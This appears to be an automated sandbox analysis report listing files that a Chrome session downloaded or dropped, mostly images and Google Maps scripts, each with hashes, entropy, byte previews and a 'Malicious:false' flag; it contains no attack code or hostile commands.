                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):78900
                                              Entropy (8bit):7.9972804490010985
                                              Encrypted:true
                                              SSDEEP:1536:oW+thaK3/9C4utrtapVjDKvQfc7yCdr3w3G2VhyhspDHyCcp/gW8MjV6:oWS9C4krtWOvIRT3G2VohsNHyCXW16
                                              MD5:5871405B407E424BCA4E3DD3357FEA5A
                                              SHA1:16D8AAD44F84CDEE5D11A7EEDC172E885DB6F29A
                                              SHA-256:9C0F0BC339AB37B3B5FBC8763EB7C601305F404717660C11790E3584F3BDC150
                                              SHA-512:7C8B2357F1D93B82C59673180EF9F49C75096602F24B0EC33E50F95B71AA067DCB7976BF02760A852FC7899B228286D109FC5704EC474FB65660344EF5B6446B
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/projects/24/edfba0a01d899e45cac743ee4b47082a.webp
                                              Preview:RIFF,4..WEBPVP8X..............VP8 .3..0....*....>.n.P)&..'...@..cn.1.....l..`yC..z........l?k.C.I.|.....G..m~....,&M......F<.g......{.......>.._.U.}........Q.w...........}...?.......Y..i.3..6?......o.. .V........}G............<.v...._..._.>.wh...i.s......M.r...+......W..~.N.3k.f....GA..XP..9h...M.._4_.<..j....^..z......^.T.s....A.T..hu.i._@.D...meT..*..g...._..DOE.f...k..c...0'.......[\.......8...x.v.s6t[.o.swKb.....-?>.C........5......=A)....y..xT..>..'he..&.*....&...z..s;Nr..h.Bq.P0..1.YI...)"./..K.2.X.V..;Y.....a......Cf.......>.X.....L..a;..y....Y.W.[../..}...d>.B..aU5Eq/...B.l.i)(p....B..P.+..E6.~..M..._....eB..........m.omcS2^.m.:..}..O.:u.]...<.d.*..u]9.W.+.H/3..)@7.9IT.....d.:.Kz....j...=..\]$....h..T.>...g.+a.WU...F.X..c.D...j.IYf....\P.k/.KUQ.s..q..h.T....r..u...Q./.}..3.H.\.P..*........&$/=!.X).....%F8...g.l#.!fau....89..)...i..@X.....k0....<..m...7F.....#....[zwO..&vh..?..H}e..[..r.....o...2e...=.....<...|..g%......L.-..o
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):2347
                                              Entropy (8bit):7.887898209982117
                                              Encrypted:false
                                              SSDEEP:48:Z2Euc2k6YUEkOw+zKPCj6hDowJNwR1052mcKMN53C7lhZZNI1:V2kcDz+z406+6Nu1K/G1
                                              MD5:0CDAC319B3C9622FD9D881DCCA0E6EA3
                                              SHA1:557DCBF7B282C53393E79821757B8D099FD85C42
                                              SHA-256:591339DAF9E03733C26C8D0A613E00F709764857626A36D61D858073C29D67C0
                                              SHA-512:F05F3CA28406387535557499EB216C19D4C1CC2481CD9681DD002B648F9565A3B265F8847991420C7C585C98ABB14D1236BCE34D35FF7ED88EA04A01731249A6
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef...cPLTE..........u.....n..~.{h....................................348...qqt......NOS.........~m........D......IDATh...b.:.E.VM..V.$.....L.......j[.b.}N@.JM..Z^.e`d4...=2........oG.. ~...3.;.I.Q.!B`..)8%........RbU |....?{P..aLl.#......a.a.....2d.....c.2..Vy.O|....o..j.1\c.....H.<.hx..Y.?..H.C....cx.a. OAH...4...1...1..c\.....o #.#.p{....X.E....gR..H....b.....K....C@\.q.z.c...O#.B.3."w........s.(X..P....4..I.\/aD ..$./.K2.ax.qI....sRT.0jTJ...<(pA........9..S....b......d8..FC8,.)wG.~=....$..<....r..I...W..JX..+a..L......S,ud."..` .. .0...s..hvJd..Hj...P...K.."...FL8.cs........7dj."....d......0WGa...^...0t..f8.cv....9.2.E..S.Q.3..<..1j#...L.R>@D.&".m$.E.8.&Z../e.s.sy% .;..:DEbx9^.K....%.t+.q2d..~...wxv...K..._. .-......=.#........!^......i....&.BA.D"...!<..){.rpR..f.30Y..[.A".}w..".8...~..2. ;..&=N(.I.S.6o.. .-'.5..2..H.~.D....b....z..F.. ))..DB$.Y.S...J.....#B0.P.e..+..o..F7g...(1..1q...h.R<..W.+..g.d.T.J....n\[......
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):30278
                                              Entropy (8bit):7.862024809612423
                                              Encrypted:false
                                              SSDEEP:384:9UlO6e2+SjgXGuk2Ob7ucWrrVQZUzWG2hRlftajs2omqU0odvi7g9HFob1letEpy:Q+RG12Suc1Mg4jsJHUl1VFob1Yt0fa
                                              MD5:80DAAA59249F997210E703C6519E57F7
                                              SHA1:E1586D20CFA49A007B7EFE195D3C6D246138E1B1
                                              SHA-256:49C5DC1BCD630F5D88B240C65B223082AE408C6D94851C071E57B18117A071F9
                                              SHA-512:79A494992079353D564B60C2D7ACFA08CAE6EF11429900AB38BC705A6D5A98096A4E2844B9FF40B91A6B6D939247CE2BDBB94608649D02B5E0F21C68FAA3C5EB
                                              Malicious:false
                                              Reputation:low
                                              Preview:......Exif..II*.................Ducky.......d...../http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:F8D6A625933D11ED89EBF64F108C6D06" xmpMM:DocumentID="xmp.did:F8D6A626933D11ED89EBF64F108C6D06"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:F8D6A623933D11ED89EBF64F108C6D06" stRef:documentID="xmp.did:F8D6A624933D11ED89EBF64F108C6D06"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...&Adobe.d...................E...^...vD................................................................................................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 1000x800, components 3
                                              Category:downloaded
                                              Size (bytes):168729
                                              Entropy (8bit):7.98380703685641
                                              Encrypted:false
                                              SSDEEP:3072:+j5UOMOc+MxpewEcu95pHWjHo/UeoEsfHZe1Hny4M/vc3z4OYrs055b/Z:m5UOMR+upe5n5kLvdEuHwM4M/n9r
                                              MD5:782167EB1042DF2AFE7F0AAF1F7E33AA
                                              SHA1:E15B170346B3216A8D50D40766578AD887B3D8C8
                                              SHA-256:AF46726E25B6EB3C0A6D61134E8B8A2AEC32FF79D2670C7E563B71C35921DAA7
                                              SHA-512:804940AA2A2C6A4ABC85D92C30B53511297EAB4743648C66A0205B6F6F64D31A4C4211BD31D3ED556DEC65CDA9D13AA8C15B5B70C0740366DDEAC4301306FA9A
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/services/7/b1dc02449d030b39b8114e1de7955bbd.jpg
                                              Preview:......Exif..II*.................Ducky............./http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:0E36F9C3934311EDB686811DEEAB7B56" xmpMM:DocumentID="xmp.did:0E36F9C4934311EDB686811DEEAB7B56"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:0E36F9C1934311EDB686811DEEAB7B56" stRef:documentID="xmp.did:0E36F9C2934311EDB686811DEEAB7B56"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...!Adobe.d..............H....:..............................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (10616)
                                              Category:dropped
                                              Size (bytes):11766
                                              Entropy (8bit):5.938839813472399
                                              Encrypted:false
                                              SSDEEP:192:2IGIsmhPhuKILOUPvROGXNXEcNFa2sVCR/Ib0j3X+mavMPW+pPo8tvFDegG/Rmwl:lVsmDuzL7PJOGXNXbNFa2sVCR/Ib0j3i
                                              MD5:3F56B85CD10E5C185D834073EFAE0A1B
                                              SHA1:F1FADCD31FDDD9525516C87FB4C92834409273FC
                                              SHA-256:730AF3B0F8555E35E2E03653FE9027DCBDE031A51CB1F9013BF13F92EEBD8EBE
                                              SHA-512:AE6FB2F591D24801945D7856EC490DE3AC620B2E47451303111467A3D82E326A5DBCAA76E282B19151832AE6D4508F4717B7E141A51F8AD4012B1497CA851001
                                              Malicious:false
                                              Reputation:low
                                              Preview:..window.google = window.google || {};.google.maps = google.maps || {};.(function() {. var rules = {. createHTML: function(src) {. return src;. },. createScriptURL: function(src) {. return src;. }. };. var ttPolicy;. . try {. ttPolicy = window.trustedTypes.createPolicy('google-maps-api-loader', rules);. } catch(e) {. ttPolicy = rules;. }. . function getScript(src) {. var a, nonce = ((a = document.querySelector("script[nonce]")) == null ? void 0 : a.nonce) || "";. var s = document.createElement('script');. . s.src = ttPolicy.createScriptURL(src);. s.nonce = nonce;. document.head.appendChild(s);. }. . var modules = google.maps.modules = {};. google.maps.__gjsload__ = function(name, text) {. modules[name] = text;. };. . google.maps.Load = function(apiLoad) {. delete google.maps.Load;. apiLoad([0.009999999776482582,[null,[["https://khms0.googleapis.com/kh?v=988\u0026hl=en\u0026","https://khms1.googleapis.com/kh?v=988\u00
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):43004
                                              Entropy (8bit):7.9941683407587085
                                              Encrypted:true
                                              SSDEEP:768:cPl7Ocs9EfMJsFkBXel4HP+xfgS4DbMZbclRw5O6QkeNXvCVoFpNNG6qr+1nnF:h79E0Zo4vIfonMJcXwDqXvCVmjG6qr+L
                                              MD5:6534F5D0696789962E2931E36D7240FD
                                              SHA1:E629247165D16283F18CC3A3E38665EC53707E74
                                              SHA-256:0D8B1A1EE5B8DB5C53F91B6D0E837573E8ED6A045E655B0896347A7285AFFCAB
                                              SHA-512:609598525CA9360D9ECB5C8174A04695ED580A6995E85C45CAFE93A94F133B54E1B3B70395930DE09105A7970602771C48AB2B7F0857171C40567FF7CF789FCC
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF....WEBPVP8X..............VP8 .........*....>.p.Q.2?...Js...en....i..g.....j_.8.w`....{.A.a.[j.?..>......>..?u....~Un..........o...w=.......................M......@...........]<.....=...'.>...9..;..^..D..Lx.......6'}a..=......%...-...$.R)a.|*....(H.e.....A^...|)..A.D........%......p.m.D.W..l..H..0...(0.+V+|.q..J..(k1..Bw...5F......J/.x.0J."....q.O?.b....SJY.\:K..L6.g.m..u..< .3...a.\F..[..-b[.:.,.w.Vu.i9..V.e....]}6..3.....M.<TI..i.u}......FdfXv..Ub.(.%.......;:t2An.."z....7.f.N...g|.fo`..Z....S|.\......5..U.......h...H....L=0.x..&E.. [9... ....B..0~.3.Z.u..0.R/.1...../.m\.@....q".dd.k.Dg.4.t*H.II.Z....2.....>.....7......".z.y;q....3e....o...1....P..-|/E2...r=.`.r.s4\.C..t')...s....[...J...b..}...=UA.~..GS..[.(.4.(3Q..9h...zBw...H.2R..".n....,`..e..K.v.]!..k.F<.F,..g-xLc...z.}.O7r......3..LK...Z.......l.........R.*..Zc...Wb...)..7..lw.C4.0.K......=(..L.0!Mv.FT........=....z.......<...u.j..sg...9H6.kU..j._..S.@.it.8....0....2.U.5-..V.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 22 x 22, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):3429
                                              Entropy (8bit):7.9008187670194205
                                              Encrypted:false
                                              SSDEEP:48:u/6DocieftI9G9f6A+FIDOWu0lDl+gm7QyTtctIInQSy6IVpqlnBcODdPlSw1lHK:uSDZ/I09Da01l+gmkyTt6Hk8nThlfgH
                                              MD5:A1DD359517B8BB2262F12C2674385898
                                              SHA1:28DCE6C0589ABB0A13AB9B6EE4B47EE17DBC85DA
                                              SHA-256:7BF65445CFB18EC423EACB8ED920F41126178515E22D00D7C8FF249CB1144D13
                                              SHA-512:943BC6124DC8B8705E7C1FF1E151F5DCDABD5F044819A0B2AB449BF72AE427CD18D4560D483271CE561C355013BAD2BB8EBD0F450A44ECC07EE7BDCE2B0E3A66
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/images/rlod.png
                                              Preview:.PNG........IHDR..............l;....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):18242
                                              Entropy (8bit):7.980590830519526
                                              Encrypted:false
                                              SSDEEP:384:Z14hJBM5u3E1+2ZfiluQyjNA+Pde5PI8t3+V0ce7/T5M9:shRb2hR5NA+4Bpm9
                                              MD5:FE13D641DE3736A1366E884DD2841819
                                              SHA1:999BB93BB6A7ECFB50CE9FBBBC829C8CFD72D6C9
                                              SHA-256:23560EB1D339222E5B57D3700004C7D2C7E4B6286BA627D47CC85412EF663FDC
                                              SHA-512:34810C45AC83F8D315304C192910889854B71D3CEDF4FE297357A175601EFE20A5B25C601607EA95A5CBC8B4E99629CE73EA851FE4B1CCE049456A2893022C82
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.google.com/maps/vt?pb=!1m5!1m4!1i15!2i21411!3i14014!4i256!2m3!1e0!2sm!3i707457593!2m3!1e2!2sspotlit!5i1!3m12!2sen!3sUS!5e289!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!4e0!5m1!1e3!23i47083502!27m15!299174093m14!14m13!1m8!1m2!1y4494427010317758935!2y5827414787517094799!2s%2Fg%2F11bbth6f7x!4m2!1x251881333!2x552584050!15sgcid%3Ageneral_contractor!2b0!3b0!6b0!8b0&client=google-maps-embed&token=61187
                                              Preview:RIFF:G..WEBPVP8L.G../..?.....m%.#3.:t.-a>....l"IV.(......x&>C...w.".v.........0.pD.......QBI....$`D.Mc......)...h...PB.%D.6.z.O.r}b?.q....).M.N...$...K.O....1..4...*..<.Z..6..W.....\.X..r.H..m.=..{t...lk..I.~...$ ...1...X.vVVWf..a ...."./Q..m..8E$."A..$..........."..i.8..%./q.?..k....#.T.(.....k...8N.......Y.j..N.......<)...W...9^......X.YV..xU.......a...U.s...k..$)/t...q/.S .^..9...Qdg.V.Yp+...|..E.......K.].!.....R..s..jGy..Ff.`...KX.#.....h.%.zu.........Uhof.s8.....{V.nz..g...S...l1...b.J.0.....X...<r....m.T....v...\$.<K..^...kn....Ef..^.n1./?..$X.y...*.X.t.MV:......ygE..^..\...R$........id..Ip.K..a........T....m..uVfm.u-..A..x.P.m-.w&....R...]g...v..7srdl;n&.g.e.#:_.<../3.>"D.C.[./*....(..sl.%..Z.bAy..x.f.)..F..G...".......L.."Ls'...FD5.2....GG.|UFg8.6.}....m.N..nlc.X..?+Ch...%[.uT..vw..l...~..Q.e...H.>.7...nK,..=..Q}..i.......n..sb..*6...G.,{X..D.6.=...}}............2W.?....%<.Z.!<74.....Q<.M9.!..;......W...&>|3...w.\.P9J.C.:.....r.XdjPl......
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (1159)
                                              Category:dropped
                                              Size (bytes):338712
                                              Entropy (8bit):5.61633684161754
                                              Encrypted:false
                                              SSDEEP:3072:o7Ay2hxnVV2GDbjq5ZfFMinfgbYeVjJ4gVp+6I7w7MyE9at9idYEH:okyo/2GHjq5ZfSbHVd42u7w7rEYtUSS
                                              MD5:91680884EED37B5ED4A53094296D6527
                                              SHA1:F3DF67A86E7B4C75F3C47F8E4EEF569CB2CE080F
                                              SHA-256:7B423B08E9EB0B19D9CE4B1E1F40B4EF0C00F40499FFFCE239FCA160BB07CFCF
                                              SHA-512:C3C0149DF32C9E40CF09DD0A37240935F26353A8402C6BCC6EDA3304FDE962A4E3D7B41F40CA3DE929AAF4F8B20F4812D97D2027E274284E84206E80F3BDECCD
                                              Malicious:false
                                              Reputation:low
                                              Preview:(function(){'use strict';var p;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}.var ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ca(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}.var da=ca(this);function u(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writable:!0,value:b})}}.u("Symbol",function(a){function b(f){if(this instanceof b)throw new TypeError("Symbol is not a constructor");return new c(d+(f||"")+"_"+e++,f)}.function c(f,g){this.h=f;ba(this,"description",{configurable:!0,writable:!0,va
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):6481
                                              Entropy (8bit):7.952588965554541
                                              Encrypted:false
                                              SSDEEP:192:k0268DNqK0Z1w4m8VJxW6ACu7ndHAWfmymf:k09GqV1w2J468ffmy2
                                              MD5:8F16A4934E562FB8E3CA09315BC37FB6
                                              SHA1:62949BE24191D38D435C2AACC6CDFA83F272DBB9
                                              SHA-256:7DFC1F69BF07DF3B098494BA2B24611914928CDEFB8D08597121860829718C62
                                              SHA-512:95853BD11C788C8B0D57A65EB1ABF3C0788F96EFF1A5B309C382D049FBB211ED1D9E581D3C48F75D497EF2F0546454E971389CAA7F7F5375C7DDAFCA196607F4
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/erp.png
                                              Preview:.PNG........IHDR...d...d.....G<ef...aPLTE...........U...................99............................-9...................63.........................Ic.'3.F].6E..C....AX....1?....N......>...........J...............................8.;N............G..P.+/.DW........*....O........z...;6..P..........P...........>J.K.............T...J..E../....O..E....b.....N..Su.......Ikw....................^..M......................l..z....Qln..........D....;]j`......n..H. ........w|*Ve.....z......1......a.._...s..V........1...X...(....:..J.PO....}...l..?J...K.o....?._f.{......?..........._.....L.J.......(......."-3..S.......Gp...."....IDATh...k*Y..RU.....,..h...V.e...X.>Tf........A..Fhpeo..M.d..N.&?&.2......j.-..IOr..,r?u..~..\....r)...U...K."..M.........|7._.....f0.H..q.o~.d....e..zO(..$..I...:/uG7.9??8....r....z6{...v0. .S..1M.......B..5?6U...........@....G..]......L.....x.VA..$`sx.....x...._w.PHF7.....eV....,..UF.y..0..8.<.N...r........[......}...+.'.4....
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):2390
                                              Entropy (8bit):7.570503951031916
                                              Encrypted:false
                                              SSDEEP:48:/11LNn2TkJ33LpvaN7LAf+xKuW83iJMerMNDiWp8AyA8L/Pu7:tX26pvaNHAf+EuW7tIzxB87C
                                              MD5:1DEDD95A3E6D56997B626323F6A2AEF7
                                              SHA1:EF4966E703966F2BFDE32BC2C286484465A8013B
                                              SHA-256:FEFD3F4E2D9A84F21C177B94B036FC59705CF65D5CB35997C3ACAC22B1029672
                                              SHA-512:A8AD4ADED17C7C5C3D1DFA295F53C426E1366C289071F2E96E51BDF6BA60780853F269444354BA5F6F70DBF58EA0513F0DA3D9D9FD25DCD086D9F85D2598E4A6
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/favicon.png
                                              Preview:.PNG........IHDR...P...P............tEXtSoftware.Adobe ImageReadyq.e<...%iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 21.0 (Macintosh)" xmpMM:InstanceID="xmp.iid:807AF45A47A411EB8ECBFF6BC59472BB" xmpMM:DocumentID="xmp.did:807AF45B47A411EB8ECBFF6BC59472BB"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:72E0E3FF475711EB8ECBFF6BC59472BB" stRef:documentID="xmp.did:72E0E400475711EB8ECBFF6BC59472BB"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..F.....IDATx..Ml.E..w..i...F..C. H4TQ.8=...,.....!N.....8"S..!.:...#%. q...U*j..ZD.BS.j..q..f.q....~.x=O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):4807
                                              Entropy (8bit):7.947883768061024
                                              Encrypted:false
                                              SSDEEP:96://rVeSxBum/8S2INHgv29fNiwr9sYfzm5kukNZvHLxounMMeaAk://JeSnum0SbNgAiwr9dFuKZjHn/lAk
                                              MD5:C6F7B0CF2EA67E205FA0550AED21062A
                                              SHA1:474308A9805FB204A556713A6021F164332A3AC2
                                              SHA-256:741353DCD6ABBD966B1B234A42233882E2DF23BB34A2F73D57A474168F66B65F
                                              SHA-512:7C4E928E81C0ABC788C3BF1D13B61F312478F5166577FCA817AAEEED42A0D74AFA790CAD925904AB435B466B1A87526A4B39709AD55D847D1F6ECFAA464B108D
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/custom_ecommerce.png
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE........................!.......f.....d...................<............d......$............ce\d....8......V...{......]...*.....>.........]xmwmdl....3..........$...............3......y......8...'q..&..>.............s~%.......R.&.....n..m.....h)...<y#.........*...~ky.3v.............X..k!....;...C...D................x.....h..........^a.....................c....~q..]........C........Y..wR.........Jx.U.!..../..Y.Wz.9vg......4.s..myz6..K....4.|...............d.....IDATh...O.j..k....Vj..#F...\').AI-.I..... f.. ..a8$..!.$&;.~...fr....S...$gg.>.....s?R+++..KK./....yQK...../.YZZ ....Y^~...=....e.._...........]#....<.....K.E|O|5.w;....7.s...ZZ\.%..`.Z....jI..es.....4..Y.6..H1..@.bQ`......|.......i.....o....EQ..C...8...qj*.r%..".O'../!.J$....'...y..9..(@.b.2.q.....-..O...WT..A:...rB:..|.\...".d..rgB.9..M..'.x8Q.-..-b2E ).b....0..a.. x..L,.yI.........e.5t].9M.).S]pW*...." L.a|vT@a......D.v;.so..,...M._=x.J...JR.q.v..!"...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 251 x 251, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):36145
                                              Entropy (8bit):7.96611202102991
                                              Encrypted:false
                                              SSDEEP:768:nXu2DuEXNSqaWiV5MfjeV7DmWoAA9atb0bTO:Xu2DCqa55yq5qIUabN
                                              MD5:6A1D43BFE84848198CC10C663B676DB7
                                              SHA1:2EDAA08B89E3B327BE8AC405A32F54185F2D4603
                                              SHA-256:8BEACEB445F0740480B7C7E86A4F583F076E19B78C92E0EBEEC4822265144F73
                                              SHA-512:432627D7C568D8D9D96C7D63A4A8B19864390076006AC4969A4D609C1BDC434E49EDD554654B7BB77C816A699D350DFB60E1271E884D7CAE5DB436125F0037C2
                                              Malicious:false
                                              Reputation:low
                                              URL:https://pdf-online.on-fleek.app/w.png
                                              Preview:.PNG........IHDR..............r.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............tIME......5l].....IDATx..w.&.Y....~.w.....Z.l.mY8..0.s8....d..;~.|....8...0.........Gp.,+k.V...N.7t....+<U.....i.)..y...>...-.4A,.s.C..-u..%...N...!...o.:.....N.u...\...y...?.........]..7P.......w.....t..,.E...{.......V._...=.Q4,A . ......Z..0-.<.... .....a.55!..B.....B..R..H/.<..xS...97..LA.s.!..q. =...q....;. @..P.V...2.B.V"jl.6....3.......X.K.....o...2..%\h.'.....;W.....n..P%...X8w.l."....{..-..F@.F.6.g.^.&;.s!...H}............'...O}..c?.o^.".'..<M.....A..MNx..'...@.u..u....?..U......qN.v....X.mK....Bt].9}.3"....>A.*U.FV5.6n=<.n.7.ML..G.....W.<....i.....Y...>+O.s....`o........(\......... .9!...]...,b_..y..H..9mc.\.....3....."I..L..S.V.NO^.q...>.%/.......v..j......s..,...H}..'.P.......[.4...M..nz..@-.Ba.W?-... ..V..{.....! ..^.s.r......=..RBLM :r.w0..n....<.........O....B`~&.F)......a....S....._9.Ek.8>.s.}..7....,.z.N..d..~.Mt.#9
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1136)
                                              Category:dropped
                                              Size (bytes):1599
                                              Entropy (8bit):5.267838660635414
                                              Encrypted:false
                                              SSDEEP:24:hY6svD+6zSU6pedQf3Zvcn1BZdAe1nCr1LTHI5z8xZS8f:3qD+2+pUAew85zssA
                                              MD5:5EDBA73F30F0D3A342CECCB3A34BFE45
                                              SHA1:3F39E4C8EF00408D327260F5328162AB3E5D3CAF
                                              SHA-256:F768529B209DB7EDF38AA0DA2A69C1C1DBE5A760D457FE74080D3AD76F14A0C2
                                              SHA-512:C302E3CCC2D9F2E12133ED07082A78260613F1B8C756D9EB2CF0A7AF63C425D4A8956B01EAE3FC3DFAB506DACF6416B0B53929D535CFA2AD81951183A6526FE7
                                              Malicious:false
                                              Reputation:low
